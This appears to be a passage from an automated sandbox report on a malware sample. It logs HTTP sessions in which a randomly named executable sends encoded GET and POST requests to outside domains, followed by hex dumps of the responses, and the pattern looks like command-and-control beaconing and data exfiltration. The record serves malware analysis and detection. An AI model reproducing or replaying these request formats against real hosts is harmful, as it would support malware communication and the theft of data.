                                                                            Data Raw: 63 33 33 0d 0a 80 90 02 80 f8 9f aa f6 df 73 c6 45 7f 56 0e 94 f6 11 0c 92 9c 28 51 de 18 bc 29 7a 21 e2 4a 84 17 04 f0 00 50 e1 6b 34 f3 8b fe 17 45 f7 ef 5d eb 15 b2 42 d9 0a 9f 64 22 f6 ee 13 e2 64 92 a3 bd fd 44 d8 56 31 3d 5f a5 00 50 c8 1a d9 1a 5b a1 fa 18 d3 fb da 49 39 8a 08 d4 ca 66 62 04 5c 64 76 10 1d 44 d3 26 b4 6a 00 ab 37 aa 7a a4 d9 a7 0f bd d9 41 04 00 7b 88 e3 df ec ba c1 2d 85 83 e6 2f f5 14 aa de 96 e0 e9 34 35 34 6f a9 ea 89 90 5f 8f 48 d8 b6 7a 40 45 50 a7 04 9b 7f 6f cc 7c cd 15 55 45 8f 28 37 26 b0 41 fb da 1f 1e bf 05 63 b3 76 7c d8 87 67 f7 9f dd 7f 82 d1 a3 1d 9a 29 98 0d 58 fc 7d 1e 1a 5d 3b 0a 84 d1 23 5c 3b a9 83 d4 4b 3c e9 94 da e2 b9 0e b4 74 3c 90 c0 7b 33 37 41 d6 f8 b0 f5 81 5a df cb 66 07 23 52 4d 34 4b a0 c9 59 18 07 85 71 de 04 4b 63 96 8a ac ea 3c 89 2c 9d 5a c3 ec 1b d3 22 c9 e7 f0 35 99 fe 2c 16 34 68 06 77 4e 81 ff 26 35 21 58 5f 66 99 6f 78 c3 17 23 91 d6 a6 25 d0 26 b4 3c b8 59 4c 6f 7a c8 62 a2 5c 49 74 d9 d9 da 32 a0 d7 cd 3a ab 0c 17 3e 1b e6 c3 51 96 [TRUNCATED]
                                                                            Data Ascii: c33sEV(Q)z!JPk4E]Bd"dDV1=_P[I9fb\dvD&j7zA{-/454o_Hz@EPo|UE(7&Acv|g)X}];#\;K<t<{37AZf#RM4KYqKc<,Z"5,4hwN&5!X_fox#%&<YLozb\It2:>Q_-f#2f+saa-C WSB4;k[79I$re&*hy%_h'zaV{`SLEBO"6;IsioJfTg H:/2X((oq&oZNbb]:,[+<j&?'Uk"38<Oy~wsOR<H{6!YIYg4U`n6v!ExI0=b'$6C@;'F/cOQGC~,a&k&(iIs4gL{N9vukYyuh1F]T/YiWVdV9O4^'\@)l9rzd$&~0bv84@nMD5%5fE/
                                                                            Jun 19, 2024 22:39:37.208062887 CEST1236INData Raw: f7 4b e3 4e ce 23 a1 f4 b0 ce ce ea 4d 2d b9 62 4a fa 90 36 99 e0 5c 1c 1d 2c 84 5b 03 61 9f 95 8d 59 91 13 69 05 0e f0 00 bf 5e ce fe a9 94 2c b5 09 fd 52 71 1f 98 59 b0 b0 b5 34 28 cb 31 47 eb 1a 9a 47 85 44 89 b8 1c cc 36 f4 3c 53 60 b1 b3 e3
                                                                            Data Ascii: KN#M-bJ6\,[aYi^,RqY4(1GGD6<S`/"=@QMSJr_KlkNdSiM`, iT_2_ZQo_(<?R;{/1@DQ2)][6m!D4dk1j#oZ%<?NjnCp6bIe1B.Y^8
                                                                            Jun 19, 2024 22:39:37.208101988 CEST1040INData Raw: ae 67 79 c3 5b c2 9d aa 42 3c e3 29 b3 4e 7b ab b8 6f 62 08 92 6a fe 75 ae 57 d2 87 94 0b d1 8f 55 d7 47 16 0c 9c 9d af b9 11 db 6c 76 7b 8e c9 17 98 88 b4 b2 39 6b 1f 85 a8 aa 4b 0f 7d 16 b6 4e b9 f5 d9 12 c3 4a d9 4a 0a d9 c6 98 1f fd d6 5f ad
                                                                            Data Ascii: gy[B<)N{objuWUGlv{9kK}NJJ_"a/|:+]'emMtNYhj?of_fv#abd:lwu$uaZ*|8S@D6wJ(yi@DpA2>n#ug(pU8{VBB
                                                                            Jun 19, 2024 22:39:37.212070942 CEST11INData Raw: 31 0d 0a 03 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 10


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            12192.168.2.44975664.46.118.35805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:39:38.488833904 CEST431OUTGET /0a9p/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=V8kIBUO99PR2h3hwNikpQa7QEoMXp00tAHbGwYfDKyusvK4qrRX5UHKQt8cO5YQS4wmk4tmPPEFmQcKp7F6SbRMe/fNWKGzhA25w4nUiqWWc/J5aoRnGifc= HTTP/1.1
                                                                            Host: www.shahaf3d.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:39:39.959783077 CEST1236INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            x-powered-by: PHP/7.4.33
                                                                            content-type: text/html; charset=UTF-8
                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            cache-control: no-cache; private
                                                                            x-litespeed-cache-control: public,max-age=3600
                                                                            x-litespeed-tag: afb_HTTP.404,afb_404,afb_URL.bb612978f523fb6348e4e3107ed53975,afb_
                                                                            x-litespeed-cache: miss
                                                                            transfer-encoding: chunked
                                                                            date: Wed, 19 Jun 2024 20:39:39 GMT
                                                                            server: LiteSpeed
                                                                            Data Raw: 32 39 61 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 53 45 4f 20 2d 2d 3e 0d 0a 3c 74 69 74 6c 65 3e 53 48 41 48 41 46 20 33 44 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 6e 63 72 65 74 65 20 33 44 20 50 72 69 6e 74 69 6e 67 20 46 75 6c 6c 79 20 49 6e 74 65 67 72 61 74 65 64 20 52 6f 62 6f 74 69 63 20 53 79 73 74 65 6d 73 22 2f 3e 0d 0a 3c 21 2d 2d 20 6f 67 20 6d 65 74 61 20 66 6f 72 20 66 61 63 65 62 6f 6f 6b 2c 20 67 6f 6f [TRUNCATED]
                                                                            Data Ascii: 29a7<!DOCTYPE html><html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> ... SEO --><title>SHAHAF 3D</title><meta name="description" content="Concrete 3D Printing Fully Integrated Robotic Systems"/>... og meta for facebook, googleplus --><meta property="og:title" content="SHAHAF 3D"/><meta property="og:description" content="Concrete 3D Printing Fully Integrated Robotic Systems"/><meta property="og:url" content="https://shahaf3d.com"/><meta property="og:type" content="website" /><meta property="og:image" content="https://shahaf3d.com/wp-content/uploads/2023/08/shahaf-3d-concrete-printing.jpg"/>... twitter meta --><meta name="twitter:card" content="summary_large_image"/><m
                                                                            Jun 19, 2024 22:39:39.959844112 CEST1236INData Raw: 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 48 41 48 41 46 20 33 44 22 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63
                                                                            Data Ascii: eta name="twitter:title" content="SHAHAF 3D"/><meta name="twitter:description" content="Concrete 3D Printing Fully Integrated Robotic Systems"/><meta name="twitter:url" content="https://shahaf3d.com"/><meta name="twitter:image" content="
                                                                            Jun 19, 2024 22:39:39.959877968 CEST1236INData Raw: 6e 70 75 74 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 31 39 30 38 30 31 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6d 70 2d 73 75 62 73 63 72 69 62 65 20 3a 3a 2d 77 65
                                                                            Data Ascii: nput[type="submit"] {background-color: #190801;} .cmp-subscribe ::-webkit-input-placeholder {color: hsl( 0, 0%, 90%);} .cmp-subscribe ::-moz-placeholder {color: hsl( 0, 0%, 90%);} .cmp-subscribe :-ms-inpu
                                                                            Jun 19, 2024 22:39:39.959909916 CEST1236INData Raw: 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 2e 77 70 2d 76 69 64 65 6f 20 7b 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 7d 0d 0a 20 20 20 20 2e 77 70 2d 76 69 64 65 6f 2d 73 68 6f 72 74 63 6f 64 65 20 7b 6d 61 78 2d 77 69 64 74 68 3a 20 31 30
                                                                            Data Ascii: <style> .wp-video {margin: 0 auto;} .wp-video-shortcode {max-width: 100%;} .grecaptcha-badge {display: none!important;} .text-logo {display: inline-block;} #gdpr-checkbox {-webkit-appearance: checkbox;-moz-appearance
                                                                            Jun 19, 2024 22:39:39.959944010 CEST1236INData Raw: 69 54 70 3d 6b 4a 72 74 6e 56 73 50 45 6e 46 30 4a 56 26 23 30 33 38 3b 74 46 31 74 6b 36 3d 56 38 6b 49 42 55 4f 39 39 50 52 32 68 33 68 77 4e 69 6b 70 51 61 37 51 45 6f 4d 58 70 30 30 74 41 48 62 47 77 59 66 44 4b 79 75 73 76 4b 34 71 72 52 58
                                                                            Data Ascii: iTp=kJrtnVsPEnF0JV&#038;tF1tk6=V8kIBUO99PR2h3hwNikpQa7QEoMXp00tAHbGwYfDKyusvK4qrRX5UHKQt8cO5YQS4wmk4tmPPEFmQcKp7F6SbRMe%2FfNWKGzhA25w4nUiqWWc%2FJ5aoRnGifc%3D" /> <input type="email" id="email-subscribe" name="email" pla
                                                                            Jun 19, 2024 22:39:39.959976912 CEST1236INData Raw: 0a 63 6f 6e 73 74 20 67 64 70 72 43 68 65 63 6b 62 6f 78 20 3d 20 66 6f 72 6d 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 23 67 64 70 72 2d 63 68 65 63 6b 62 6f 78 27 29 3b 0a 0a 73 75 62 6d 69 74 42 75 74 74 6f 6e 2e 6f 6e 63 6c 69 63 6b 20
                                                                            Data Ascii: const gdprCheckbox = form.querySelector('#gdpr-checkbox');submitButton.onclick = function( e ) { e.preventDefault(); // check GDPR checkbox if ( gdprCheckbox && gdprCheckbox.checked === false ) { resultElement.innerHTML
                                                                            Jun 19, 2024 22:39:39.960011005 CEST1236INData Raw: 20 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 69 6d 61 67 65 20 21 3d 20 6e 75 6c 6c 20 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 69 6d 61 67 65 2e 63 6c 61 73 73 4e 61 6d 65 20 21 3d 3d 20
                                                                            Data Ascii: if ( image != null ) { if ( image.className !== 'image-unsplash') { image.classList.add('loaded'); body.classList.add('loaded'); } }
                                                                            Jun 19, 2024 22:39:39.960048914 CEST1236INData Raw: 55 52 4c 28 61 6a 61 78 57 70 55 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 61 6a 61 78 75 72 6c 20 3d 20 60 24 7b 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 7d 2f 2f 24 7b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 7d
                                                                            Data Ascii: URL(ajaxWpUrl); var ajaxurl = `${location.protocol}//${location.hostname}${pathname}`; var security = '612143d8a3'; var msg = ''; subForm = function( form, resultElement, emailInput, firstnameInput, lastname
                                                                            Jun 19, 2024 22:39:39.960083008 CEST1210INData Raw: 20 20 20 20 20 20 20 20 72 65 73 75 6c 74 45 6c 65 6d 65 6e 74 2e 69 6e 6e 65 72 48 54 4d 4c 20 3d 20 64 61 74 61 2e 6d 65 73 73 61 67 65 3b 20 2f 2f 20 44 69 73 70 6c 61 79 20 74 68 65 20 72 65 73 75 6c 74 20 69 6e 73 69 64 65 20 72 65 73 75 6c
                                                                            Data Ascii: resultElement.innerHTML = data.message; // Display the result inside result element. form.classList.add('-subscribed'); if (data.status == 1) { form.classList.remove('-
                                                                            Jun 19, 2024 22:39:39.964849949 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            13192.168.2.44975713.228.81.39805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:39:45.830044985 CEST729OUTPOST /3h10/ HTTP/1.1
                                                                            Host: www.againbeautywhiteskin.asia
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 203
                                                                            Origin: http://www.againbeautywhiteskin.asia
                                                                            Referer: http://www.againbeautywhiteskin.asia/3h10/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 77 6b 78 72 55 39 6e 53 42 66 4f 4b 4f 7a 45 59 6d 63 4d 72 34 34 70 30 30 66 68 53 67 6c 33 66 50 4e 53 5a 48 77 41 44 5a 64 41 74 72 5a 4f 43 6a 69 56 52 6a 72 31 55 37 48 4f 41 64 51 35 59 4f 78 4b 4d 52 38 62 42 58 62 46 70 64 47 39 36 56 62 44 74 48 68 56 4d 49 74 51 30 4f 6f 37 33 71 2b 49 6c 49 57 48 5a 48 54 61 49 4f 4f 38 64 77 50 57 65 35 7a 47 42 6d 38 55 47 50 4a 38 59 36 7a 4f 50 68 6a 36 6b 34 65 38 53 75 78 51 64 43 63 44 33 5a 77 44 41 54 72 30 68 48 73 68 77 2b 57 45 73 65 2f 35 5a 44 6c 51 75 65 31 71 4d 4f 6f 71 6d 65 63 64 79 59 75 2f 61 69 41 6b 31 32 41 3d 3d
                                                                            Data Ascii: tF1tk6=wkxrU9nSBfOKOzEYmcMr44p00fhSgl3fPNSZHwADZdAtrZOCjiVRjr1U7HOAdQ5YOxKMR8bBXbFpdG96VbDtHhVMItQ0Oo73q+IlIWHZHTaIOO8dwPWe5zGBm8UGPJ8Y6zOPhj6k4e8SuxQdCcD3ZwDATr0hHshw+WEse/5ZDlQue1qMOoqmecdyYu/aiAk12A==
                                                                            Jun 19, 2024 22:39:46.797692060 CEST1236INHTTP/1.1 200 OK
                                                                            Server: openresty
                                                                            Date: Wed, 19 Jun 2024 20:39:46 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
                                                                            Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p
                                                                            Data Raw:
                                                                            Data Ascii:
                                                                            Jun 19, 2024 22:39:46.797744989 CEST1236INData Raw: 70 75 70 78 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 2a 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 73 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 67 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f
                                                                            Data Ascii: pupx.ladi.me https://*.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://*.ladicdn.com https://www.facebook.com https://*.facebook.comSet-Cookie: LADI_DNS_CHECK="2024-06-19 20:39:46.614128138 +0000 UTC m=+4135
                                                                            Jun 19, 2024 22:39:46.797780037 CEST1236INData Raw: 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 5f 50 41 54 48 3d 3b 20 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 46
                                                                            Data Ascii: -Cookie: LADI_CAMP_PAGE_VIEW_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW=; Path=/3h10; Max-Ag
                                                                            Jun 19, 2024 22:39:46.798022032 CEST1236INData Raw: 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 3d 3b 20 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 5f 50
                                                                            Data Ascii: ie: LADI_CAMP_PAGE_VIEW=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_PAGE_VIEW_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT_PATH=; Path=/3h10; Max-Age=0Set-Cooki
                                                                            Jun 19, 2024 22:39:46.798055887 CEST1017INData Raw: 71 be 1b 8f c6 f9 ed 65 84 c8 80 c2 ce e8 8e 1b b7 59 24 ba ce 42 17 9d a1 95 5c 3e 6b 89 a8 3b 32 5c f1 c2 0a c7 5f 30 7e b9 15 0e f6 b1 19 2a 6d 5a ea 52 c6 1d 2f cf ac 1d 97 bc 6b b4 0a 75 f2 cb a4 50 4b 62 b8 c4 4e 53 36 ed 0c af b8 2b 9b e4
                                                                            Data Ascii: qeY$B\>k;2\_0~*mZR/kuPKbNS6+XB\WB4X$mvyY[;%Rj#j^'bd{:Z$]HMBnT/lVh$,vvX kW`7^<0_kp.rt~.)%qQrG
                                                                            Jun 19, 2024 22:39:46.798089981 CEST1236INData Raw: 5d f7 95 ca 82 a2 94 48 e3 d9 db 83 d0 b3 1f 5e f4 be 63 f7 04 99 9f 81 3e 0f bd 72 10 72 29 45 67 85 cd f7 7c 74 e4 ea d5 49 3d 95 96 52 5b 7e ca 71 5f 81 43 0b 84 1b be c2 0e f0 08 75 c1 7f 7e 9c 6e 63 ce fb db 81 04 bc 1c 6a 88 2a 72 b8 27 42
                                                                            Data Ascii: ]H^c>rr)Eg|tI=R[~q_Cu~ncj*r'BGkBV}kJ$D|@zZdaa]oY$"a}L}YRkFcH[)Rjp&EP/5@EQAIgnwoxGrp"~4k
                                                                            Jun 19, 2024 22:39:46.798125029 CEST1236INData Raw: a5 9d dc 73 46 1b 15 78 e2 5d 1c 7f fd 7c 7c b5 78 10 bc 95 36 57 60 39 1d 3f 0c f5 7b 60 03 58 ae 61 06 a4 b6 de 6c a8 ae 7a 0a ec a7 30 dc 40 ca c1 62 0b b2 45 54 9f 50 70 f4 12 e3 4d cf 4b 19 14 22 7f bc 97 f3 6f 36 b4 36 73 69 4f 49 f1 4b a0
                                                                            Data Ascii: sFx]||x6W`9?{`Xalz0@bETPpMK"o66siOIKR:TdWQSe+t)$lTe1-T*(8bvfMJ(?</OyJu~aGe"+LJS'V/nw2l:EcQJ[|:
                                                                            Jun 19, 2024 22:39:46.798160076 CEST1191INData Raw: 9d 26 65 93 d3 87 48 e0 9a 78 cf 58 cf f4 21 9f 6e 6f bb 6e 2a e3 98 82 62 ef 25 ec 24 5f 39 98 be d0 96 12 e4 75 1f 04 8d 86 17 51 39 61 a7 1c ec 84 bc 4b f8 b5 16 e0 b7 56 7c 30 f9 d4 5c 9f 71 09 39 10 45 b3 6f 7f 73 ac 2c 19 78 78 6a 1c f3 96
                                                                            Data Ascii: &eHxX!non*b%$_9uQ9aKV|0\q9Eos,xxj-gJPtNka=m,`8A.j,</7=6FfI'#!E\Js'po{!dv*'.kdN{_'z~uzC&0]iKG*IJL


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            14192.168.2.44975813.228.81.39805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:39:48.363131046 CEST749OUTPOST /3h10/ HTTP/1.1
                                                                            Host: www.againbeautywhiteskin.asia
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 223
                                                                            Origin: http://www.againbeautywhiteskin.asia
                                                                            Referer: http://www.againbeautywhiteskin.asia/3h10/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 77 6b 78 72 55 39 6e 53 42 66 4f 4b 49 53 30 59 70 64 4d 72 77 34 70 33 2f 2f 68 53 75 46 33 62 50 4e 65 5a 48 78 45 54 59 76 6b 74 72 37 57 43 6b 6d 4a 52 67 72 31 55 6a 33 4f 2f 43 67 34 55 4f 78 48 2f 52 34 62 42 58 62 42 70 64 48 4e 36 56 6f 37 75 42 78 56 43 44 4e 51 79 41 49 37 33 71 2b 49 6c 49 56 37 67 48 53 2b 49 50 2b 4d 64 77 74 75 64 36 7a 47 43 75 63 55 47 45 70 38 63 36 7a 50 73 68 69 6e 4c 34 64 45 53 75 31 63 64 43 4e 44 77 51 77 44 47 64 4c 30 76 4d 63 63 4a 77 31 35 76 63 4a 56 70 43 57 59 59 66 7a 37 57 66 5a 4c 78 4d 63 35 42 46 70 32 75 76 44 5a 38 74 42 72 44 78 72 7a 4f 30 55 6a 30 63 44 6e 6d 7a 57 36 46 4e 34 59 3d
                                                                            Data Ascii: tF1tk6=wkxrU9nSBfOKIS0YpdMrw4p3//hSuF3bPNeZHxETYvktr7WCkmJRgr1Uj3O/Cg4UOxH/R4bBXbBpdHN6Vo7uBxVCDNQyAI73q+IlIV7gHS+IP+Mdwtud6zGCucUGEp8c6zPshinL4dESu1cdCNDwQwDGdL0vMccJw15vcJVpCWYYfz7WfZLxMc5BFp2uvDZ8tBrDxrzO0Uj0cDnmzW6FN4Y=
                                                                            Jun 19, 2024 22:39:49.305522919 CEST1236INHTTP/1.1 200 OK
                                                                            Server: openresty
                                                                            Date: Wed, 19 Jun 2024 20:39:49 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
                                                                            Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p
                                                                            Data Raw:
                                                                            Data Ascii:
                                                                            Jun 19, 2024 22:39:49.305581093 CEST1236INData Raw: 70 75 70 78 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 2a 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 73 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 67 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f
                                                                            Data Ascii: pupx.ladi.me https://*.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://*.ladicdn.com https://www.facebook.com https://*.facebook.comSet-Cookie: LADI_DNS_CHECK="2024-06-19 20:39:49.125650926 +0000 UTC m=+4135
                                                                            Jun 19, 2024 22:39:49.305614948 CEST1236INData Raw: 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 5f 50 41 54 48 3d 3b 20 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 46
                                                                            Data Ascii: -Cookie: LADI_CAMP_PAGE_VIEW_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW=; Path=/3h10; Max-Ag
                                                                            Jun 19, 2024 22:39:49.305649996 CEST672INData Raw: 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 3d 3b 20 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 5f 50
                                                                            Data Ascii: ie: LADI_CAMP_PAGE_VIEW=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_PAGE_VIEW_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT_PATH=; Path=/3h10; Max-Age=0Set-Cooki
                                                                            Jun 19, 2024 22:39:49.305682898 CEST1236INData Raw: 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e 73 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 58 2d 58 73 73 2d 50 72 6f 74 65 63 74 69 6f 6e 3a 20 31 3b
                                                                            Data Ascii: 31536000; includeSubDomainsX-Content-Type-Options: nosniffX-Xss-Protection: 1; mode=blockContent-Encoding: gzip637WQo6+-6pr4:)0tk)5E*$5w$ev"h[xr?V;J"'
                                                                            Jun 19, 2024 22:39:49.305736065 CEST345INData Raw: 1f d6 91 a0 e0 08 44 5c 30 68 1e 06 c1 fe 92 cc 2e 2e f2 fd 30 f8 0a 65 df 0e c7 5a e2 3b 09 ed 2c cf f6 83 a1 82 29 e2 a7 0c 25 8d 49 1d 15 71 de 61 25 5a 9b 86 bc bc 28 a5 ec 73 6f a3 f7 58 80 17 54 fa 25 c5 50 d7 67 b5 bb 89 46 94 54 f8 e6 94
                                                                            Data Ascii: D\0h..0eZ;,)%Iqa%Z(soXT%PgFT61y@3Hf"0V ik/L@i4mJD"u_G?w4y\z()6n|=t9HJnP5>D5C5ZFN7?W[}na
